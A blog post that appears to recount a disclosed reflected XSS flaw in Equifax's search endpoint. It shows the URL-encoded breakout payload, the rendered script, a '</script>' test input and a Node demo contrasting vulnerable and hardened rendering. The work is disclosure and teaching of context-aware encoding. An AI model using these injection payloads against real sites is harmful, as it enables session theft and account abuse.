DEV Community

Advik Kant


Reflected XSS in Equifax Search Endpoint

In December 2022, a security researcher reported a reflected cross-site scripting (XSS) vulnerability affecting the search functionality on the Equifax website. The issue was submitted through the company’s vulnerability disclosure program on HackerOne.

Vulnerability Description

The vulnerable endpoint was:

https://www.equifax.com/personal/help/search?search=<input>

When a user entered a search term, the application reflected that value, unescaped, into a double-quoted JavaScript string literal inside an inline script on the results page. For example, the term broook appeared in the following script block:

<script type="text/javascript">
  window.onload = function(e){
    Analytics.trackEvent('emptySearch',{internalSearchTerm: "broook" , numOfSearchResultsReturned: 0});
  }
</script>

Because the search parameter was not escaped for the JavaScript string context, a double quote in the input terminated the string literal, and anything after it was parsed as JavaScript rather than data. An attacker could therefore break out of the literal and inject arbitrary code that runs when the page loads.

Proof of Concept

The researcher supplied a payload that closed the string literal and appended extra properties to the object passed to Analytics.trackEvent:

%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b

URL-decoded, the payload is " , internalSearchTerm: [7].map(alert) , numOfSearchResultsReturned: "b. The leading double quote closes the string literal, [7].map(alert) calls alert with 7 as its argument (without the substring alert( ever appearing in the request), and the trailing "b reopens a string so that the rest of the server's template still parses. The rendered script then looked like this:

<script type="text/javascript">
  window.onload = function(e){
    Analytics.trackEvent('SEARCHRETURNED',{internalSearchTerm: "" , internalSearchTerm: [7].map(alert) , numOfSearchResultsReturned: "b" , numOfSearchResultsReturned: 167});
  }
</script>

This confirmed that the input was being executed as JavaScript in the browser. Note that the duplicate property names do not prevent execution: JavaScript allows repeated keys in an object literal (the last value wins), but every value expression is still evaluated when the literal is built, so [7].map(alert) runs as soon as window.onload fires.

Impact

A successful exploit would allow an attacker to execute arbitrary JavaScript in the origin of www.equifax.com, in the context of a victim's browser session. Because the flaw is reflected, the victim first has to open an attacker-crafted link to the search endpoint. From there the script could read cookies not marked HttpOnly, make authenticated requests on the victim's behalf, rewrite page content, or capture keystrokes and form data, depending on the attacker's goals.

Conclusion

This case highlights the risk of concatenating user-controlled input into JavaScript source without encoding for that specific context. HTML-encoding alone would not have helped here, since the value sits inside a script block, not in HTML text. The reliable fix is to serialize the value as a JSON literal (which escapes quotes and backslashes) and additionally escape <, > and & so that the sequence </script> can never appear inside the string, or better still to keep the data out of inline script entirely (for example in a data attribute or a script element of type application/json that the page reads) and back that up with a Content Security Policy. Reflected XSS vulnerabilities are still common and can have serious consequences when exploited on high-profile sites. Context-aware output encoding remains the essential defense.
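As an added example, not code from the original post or from Equifax, the following Node script models the breakout shown in the Proof of Concept section and the context-aware encoding recommended above. It assumes a hypothetical server-side template (renderVulnerable) that mirrors the page's script block, contrasts it with a hardened renderer (renderHardened), and executes each rendered script with stubbed Analytics and alert objects to show which one actually runs the injected code. The payload is the exact parameter value from the report; the </script> test term is constructed for the example.

```javascript
// Added example (not from the original post or from Equifax): a minimal model
// of the vulnerable rendering, a hardened version, and a harness that executes
// the rendered script with stubbed Analytics/alert to observe the difference.

// The exact search parameter value from the report, still URL-encoded.
const REPORTED_PAYLOAD =
  "%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b";

// Hypothetical server-side template: the search term is concatenated into a
// double-quoted JS string literal with no escaping, as the page's HTML shows.
function renderVulnerable(term, count) {
  return `window.onload = function(e){
    Analytics.trackEvent('SEARCHRETURNED',{internalSearchTerm: "${term}" , numOfSearchResultsReturned: ${count}});
  }`;
}

// Hardened rendering: build the whole argument object server-side and emit it
// as a JSON literal. JSON.stringify escapes quotes and backslashes; the extra
// replacements cover characters that are legal inside a JSON string but can
// still end the <script> element ("</script>") or, in pre-ES2019 engines,
// act as line terminators (U+2028 / U+2029).
function jsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderHardened(term, count) {
  const args = {
    internalSearchTerm: String(term),
    numOfSearchResultsReturned: Number.isInteger(count) ? count : 0,
  };
  return `window.onload = function(e){
    Analytics.trackEvent('SEARCHRETURNED', ${jsLiteral(args)});
  }`;
}

// Execute a rendered script roughly as a browser would: `window`, `Analytics`
// and `alert` are bound to stubs, then the onload handler is fired.
// Returns what alert() received and what trackEvent() received.
function simulate(script) {
  const alerts = [];
  const events = [];
  const win = {};
  const analytics = { trackEvent: (name, data) => events.push({ name, data }) };
  new Function("window", "Analytics", "alert", script)(win, analytics, (x) => alerts.push(x));
  if (typeof win.onload === "function") win.onload({});
  return { alerts, events };
}

// A rendered inline script must never contain "</script": the HTML parser
// ends the element there regardless of where JS string boundaries fall.
function containsScriptCloser(script) {
  return /<\/script/i.test(script);
}

function demo() {
  const term = decodeURIComponent(REPORTED_PAYLOAD);
  const closerTerm = "</script><img src=x onerror=alert(1)>"; // constructed test input
  const vuln = simulate(renderVulnerable(term, 167));
  const safe = simulate(renderHardened(term, 167));
  return {
    vulnerableScript: renderVulnerable(term, 167),
    vulnerableAlerts: vuln.alerts,                          // [7]: alert fired
    hardenedAlerts: safe.alerts,                            // []: nothing executed
    hardenedTerm: safe.events[0].data.internalSearchTerm,   // the payload, kept as data
    closerInVulnerable: containsScriptCloser(renderVulnerable(closerTerm, 0)), // true
    closerInHardened: containsScriptCloser(renderHardened(closerTerm, 0)),     // false
  };
}

console.log(demo());
```

Running it prints the vulnerable render with the same duplicated keys as the page's final script block and shows alert receiving 7, while the hardened render passes the entire payload through as the value of internalSearchTerm and never emits a literal </script sequence.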

